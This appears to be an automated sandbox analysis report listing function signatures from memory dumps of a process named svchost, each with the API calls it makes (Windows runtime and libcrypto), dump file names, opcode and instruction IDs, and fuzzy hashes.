                                                                                              • Instruction Fuzzy Hash: 0A31A0A2A1AA82C0EA779F35E44027A6765FB44B98F084176DE6E433B5DF3CE452C710

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                                              • String ID: Connection lost.
                                                                                              • API String ID: 3668304517-320266476
                                                                                              • Opcode ID: 7aca4e8d22572d76c5586afddea96cb6605fa334417803e94f2f0df69a637177
                                                                                              • Instruction ID: a5bccb7ffb43681ae25d414cd8b4dffd935ecc431c93c5f320ee30f8909627ff
                                                                                              • Opcode Fuzzy Hash: 7aca4e8d22572d76c5586afddea96cb6605fa334417803e94f2f0df69a637177
                                                                                              • Instruction Fuzzy Hash: BA8194A3A0AAC681EA328B25E4443BD6360FB99B94F548231DE7D036E5DF7CD4A1D304
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                              • String ID: bad locale name
                                                                                              • API String ID: 2775327233-1405518554
                                                                                              • Opcode ID: 8a333eecea8e93983e7a0a6e804d82f444e606bc173281889031bde093c40606
                                                                                              • Instruction ID: 23a9739761ab2723130d015e5a50c2f3e11993b3350b7ddebbe27b6cd664da35
                                                                                              • Opcode Fuzzy Hash: 8a333eecea8e93983e7a0a6e804d82f444e606bc173281889031bde093c40606
                                                                                              • Instruction Fuzzy Hash: E2418A72B0BA41C9FB2ADF70D4903EC23A8EF44748F088479DE4D66A65CE38D926D354
                                                                                              APIs
                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00007FFBAB069B09,?,00007FFBAB03B4B5,?), ref: 00007FFBAB05C186
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConsoleMode
                                                                                              • String ID:
                                                                                              • API String ID: 4145635619-0
                                                                                              • Opcode ID: e1e0fba768d46928488142fd673c0963fb07b66bed77518fb1a117bd88da810a
                                                                                              • Instruction ID: 1f100848725154073238b8c26b1a2e32f9c4e2bb5bd7c0c8c09f5b0e8d5d9a56
                                                                                              • Opcode Fuzzy Hash: e1e0fba768d46928488142fd673c0963fb07b66bed77518fb1a117bd88da810a
                                                                                              • Instruction Fuzzy Hash: 7191D7B2A1A65585FB728F79D440ABD2BA0FB44B88F05C235DD2E57BA5CE3CE455C300
                                                                                              APIs
                                                                                                • Part of subcall function 00007FFBAB443F40: ENGINE_finish.LIBCRYPTO-3-X64(?,00007FFBAB42EE67,?,00007FFBAB41F901,?,?,?,?,?,00007FFBAB417023), ref: 00007FFBAB443F72
                                                                                              • ERR_set_mark.LIBCRYPTO-3-X64(?,00007FFBAB41F901,?,?,?,?,?,00007FFBAB417023), ref: 00007FFBAB42EE6C
                                                                                              • OBJ_nid2sn.LIBCRYPTO-3-X64(?,00007FFBAB41F901,?,?,?,?,?,00007FFBAB417023), ref: 00007FFBAB42EE73
                                                                                              • EVP_CIPHER_fetch.LIBCRYPTO-3-X64(?,00007FFBAB41F901,?,?,?,?,?,00007FFBAB417023), ref: 00007FFBAB42EE81
                                                                                              • ERR_pop_to_mark.LIBCRYPTO-3-X64(?,00007FFBAB41F901,?,?,?,?,?,00007FFBAB417023), ref: 00007FFBAB42EE89
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: E_finishJ_nid2snR_fetchR_pop_to_markR_set_mark
                                                                                              • String ID:
                                                                                              • API String ID: 3538331334-0
                                                                                              • Opcode ID: 0927e5fbf129b9b27b48d1e726e7108ff00c565c336dec268f6d8413cdae8668
                                                                                              • Instruction ID: 085dbc66ee4cbdc074be4445ffbb6a26548e7194780c535bd90709ff56e9c454
                                                                                              • Opcode Fuzzy Hash: 0927e5fbf129b9b27b48d1e726e7108ff00c565c336dec268f6d8413cdae8668
                                                                                              • Instruction Fuzzy Hash: F7F0A091B5A35242E966A7B2E48516D9555AF98FC0F08C438FE6D47BABEE2CE4410300
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: df88937ba900795650b5eaa6d6d0e8d2eb4fbd0cb99e5a98e548c4b91da7f1bc
                                                                                              • Instruction ID: 43028ba807c5f2b3b92365ab997b1024697d1c6086bf5f5546e452a708f9be2d
                                                                                              • Opcode Fuzzy Hash: df88937ba900795650b5eaa6d6d0e8d2eb4fbd0cb99e5a98e548c4b91da7f1bc
                                                                                              • Instruction Fuzzy Hash: BF11B692B0B78982EE3D5631F40017951559FC8FC0F449076EE4E8BBDADD2DE5424600
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                              • String ID:
                                                                                              • API String ID: 2573137834-0
                                                                                              • Opcode ID: 087c94fe734eaef8ccf13c0be3e1a2275b33f6f0eac3206c8b224c77f0bad44b
                                                                                              • Instruction ID: 6efc5674fe2cd03ff5d3acedde9461e7aa5242634fa41aaee97d2e14afe03016
                                                                                              • Opcode Fuzzy Hash: 087c94fe734eaef8ccf13c0be3e1a2275b33f6f0eac3206c8b224c77f0bad44b
                                                                                              • Instruction Fuzzy Hash: 29617CB2A19A81C1EB159F38E04435D73AAFB50B8CF449136DB8C07A6DDFB9D894C340
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 3215553584-0
                                                                                              • Opcode ID: 25e6eba7937fd2df68da5dfd2ce53639527b20559a842f5475600718e70b472d
                                                                                              • Instruction ID: 4c15ba94dc51f5e268b92028308021aa25b44716267b2813133491b3175e43bd
                                                                                              • Opcode Fuzzy Hash: 25e6eba7937fd2df68da5dfd2ce53639527b20559a842f5475600718e70b472d
                                                                                              • Instruction Fuzzy Hash: 7251D0B1B0B28246FA7E9E3AD50067A6690AF84BE4F14C334ED7D53AE5DF3DE4214600
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a9a5bc3d059528433e37092c63e7baec89364ff8f0eb9848d44884b16a024ff2
                                                                                              • Instruction ID: b0d800873c57fae3bdc5efa2bc8d2bb79fec86042878653c19b2e4b9ab834259
                                                                                              • Opcode Fuzzy Hash: a9a5bc3d059528433e37092c63e7baec89364ff8f0eb9848d44884b16a024ff2
                                                                                              • Instruction Fuzzy Hash: 4041BEB2B06A5581EB268E3AD00837C73A5FB44FD8F188536CE4C97B58DE39D8878310
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FFBAB04992E,?,?,?,00007FFBAB049BEA), ref: 00007FFBAB054506
                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FFBAB054569
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: FeaturePresentProcessor_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 1808705829-0
                                                                                              • Opcode ID: 4635e84b82b90d1698c28812b93eb62492523e2aad87e39e364d6ef591d4856a
                                                                                              • Instruction ID: d8c6707bc2729676141a32298d2e394e77166d814d3235ec852577facca66b06
                                                                                              • Opcode Fuzzy Hash: 4635e84b82b90d1698c28812b93eb62492523e2aad87e39e364d6ef591d4856a
                                                                                              • Instruction Fuzzy Hash: 1631C4A1A0E64642FA36AB71D4117FD6290AF81B80F54C535EE6D47EEBDF7CE8208700
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: bc0705010fb45789ecfdca3bfe044c1841a352d68a7db18108ebf6cc05923ffb
                                                                                              • Instruction ID: 49201f772703dfaf3ecd7787c15a18a9a4dd282df76f392e2993b1cea61b9eea
                                                                                              • Opcode Fuzzy Hash: bc0705010fb45789ecfdca3bfe044c1841a352d68a7db18108ebf6cc05923ffb
                                                                                              • Instruction Fuzzy Hash: 6B11B2A2629A8281DA31DB35E404669A761BB84BF4F54C336EE7D47BE9CF7CD0608740
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseErrorHandleLast
                                                                                              • String ID:
                                                                                              • API String ID: 918212764-0
                                                                                              • Opcode ID: 6458880a059b35e5152587c1de7c6f389fe6edfe0a1c84f4a9904da4d9ef96a5
                                                                                              • Instruction ID: 9ab25ae7369af8bc98f97985676a13eee1fb0917ad4ec6d3e065bb9a68db6a2a
                                                                                              • Opcode Fuzzy Hash: 6458880a059b35e5152587c1de7c6f389fe6edfe0a1c84f4a9904da4d9ef96a5
                                                                                              • Instruction Fuzzy Hash: F721D4A1F1A68241EE729771E4A06BD1A829F447A4F05E339DD3D477F2DEACE5A48300
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 3215553584-0
                                                                                              • Opcode ID: 1ed12f836a697f6605108e8bddeeb1876b84fed687d500a12e50fb89f0b3d145
                                                                                              • Instruction ID: 8dd8ba5853dff2b8cf0502a0ab00af6c899efcec02c4c211b07291dca094412c
                                                                                              • Opcode Fuzzy Hash: 1ed12f836a697f6605108e8bddeeb1876b84fed687d500a12e50fb89f0b3d145
                                                                                              • Instruction Fuzzy Hash: F641037291A64183EA368B38E4416BD73A0EB55B50F11D235DEAE83BA0CF3CE812C750
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 3215553584-0
                                                                                              • Opcode ID: 7c4aee51ae4b26d18ed65c2b1e303e1887308baf6f27f23d183e8e6e7fb07058
                                                                                              • Instruction ID: 5a5802f4eba1da3149af535dcccbe9c7d856f216d7136923c407de136d402b31
                                                                                              • Opcode Fuzzy Hash: 7c4aee51ae4b26d18ed65c2b1e303e1887308baf6f27f23d183e8e6e7fb07058
                                                                                              • Instruction Fuzzy Hash: A23182B1E1A61289E7376B75D841B7D2650AB40B94F41C33ADE3D077F2CE7CA8628720
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 3215553584-0
                                                                                              • Opcode ID: 0e53a34abfed05013c821fe6a07fce241fe07a17664203467ba6e381cc40e880
                                                                                              • Instruction ID: 50342eae37b9f2c672746213361e29b75ab59d95fe6fbadbd4ea8d220bcd5789
                                                                                              • Opcode Fuzzy Hash: 0e53a34abfed05013c821fe6a07fce241fe07a17664203467ba6e381cc40e880
                                                                                              • Instruction Fuzzy Hash: 7E21DA7261968186DB728F38D45037976A1EBC4B54F548338EF6D876EADF7CD4208700
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 3215553584-0
                                                                                              • Opcode ID: 2d8476ae60e3300321bf30d7a922cdbd28b0c9d19814793c568c8b6a1dbe1a92
                                                                                              • Instruction ID: 992aca01db325ce885c61d6cd7db9b139f6615b6696ec7fc8ed48bcb912fcefa
                                                                                              • Opcode Fuzzy Hash: 2d8476ae60e3300321bf30d7a922cdbd28b0c9d19814793c568c8b6a1dbe1a92
                                                                                              • Instruction Fuzzy Hash: B001A5B1B0974541EA2ADB72D901069A691BF86FE0F48C630DE7C13BF6DE3CD4214300
                                                                                              APIs
                                                                                                • Part of subcall function 00007FFBAB055C70: HeapAlloc.KERNEL32(?,?,00000000,00007FFBAB056107), ref: 00007FFBAB055CC5
                                                                                              • InitializeCriticalSectionEx.KERNEL32(?,?,00000000,00007FFBAB066985,?,?,?,?,?,00007FFBAB06808C), ref: 00007FFBAB0666CB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocCriticalHeapInitializeSection
                                                                                              • String ID:
                                                                                              • API String ID: 2538999594-0
                                                                                              • Opcode ID: c7b1acbcfe87266fc0f9bebfcb351de7459ad498e17c031b53c3222c8f04b247
                                                                                              • Instruction ID: 1f1123a297f335e483bbfbf3727bece9c094493d11bff8b4a1c9f2617e832db3
                                                                                              • Opcode Fuzzy Hash: c7b1acbcfe87266fc0f9bebfcb351de7459ad498e17c031b53c3222c8f04b247
                                                                                              • Instruction Fuzzy Hash: 6F110E7272978186E6258B25E1401AD6760EB41B90FA8C238EB7D43BD5CF38E472C700
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 3215553584-0
                                                                                              • Opcode ID: 3bec28bef11bc3bba54c3e571dc6c374f3ad8b44711cf08515c867af371c6c11
                                                                                              • Instruction ID: 6b333187b2ca992e2a21cbe84c660bed13a8ed3b9809a1ac04535805b4beed1e
                                                                                              • Opcode Fuzzy Hash: 3bec28bef11bc3bba54c3e571dc6c374f3ad8b44711cf08515c867af371c6c11
                                                                                              • Instruction Fuzzy Hash: E8111772A05B059CEB21DFB0D4812ED37B4FB08358F508636EA5D12B6ADF34D1A5C390
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 3215553584-0
                                                                                              • Opcode ID: 44c91d0d74f90cc200fa1dd173db0d6c63e3f0b24ef1e4a101104fe5a026268a
                                                                                              • Instruction ID: b36e95fbd317d9664b89334df90f7c9b816218cbdf04d4ad6617543f9939a69f
                                                                                              • Opcode Fuzzy Hash: 44c91d0d74f90cc200fa1dd173db0d6c63e3f0b24ef1e4a101104fe5a026268a
                                                                                              • Instruction Fuzzy Hash: 51E022B1A1E64289EF3E6BB4E58117C6150AF047F0F54C330EF3C026E6DE38A4B88201
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848034632.00007FFBAAFC1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFBAAFC0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848014581.00007FFBAAFC0000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848268519.00007FFBAB18F000.00000004.00000001.01000000.00000008.sdmp
                                                                                              • Associated: 0000001A.00000002.2848290968.00007FFBAB194000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbaafc0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocHeap
                                                                                              • String ID:
                                                                                              • API String ID: 4292702814-0
                                                                                              • Opcode ID: 9e6ab98372be8dbbc01cc3b2e490f32f81acd33fe3b8fcc01c806bca5ac95083
                                                                                              • Instruction ID: 6429dc8122838f3444c86a0e52a4349a974b24975017904e5669744e14452dc3
                                                                                              • Opcode Fuzzy Hash: 9e6ab98372be8dbbc01cc3b2e490f32f81acd33fe3b8fcc01c806bca5ac95083
                                                                                              • Instruction Fuzzy Hash: D0F04FE0B0F24649FE7656B1D4117B856906F84780F58D134CD2EC6BE1DD2DE8A04310
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
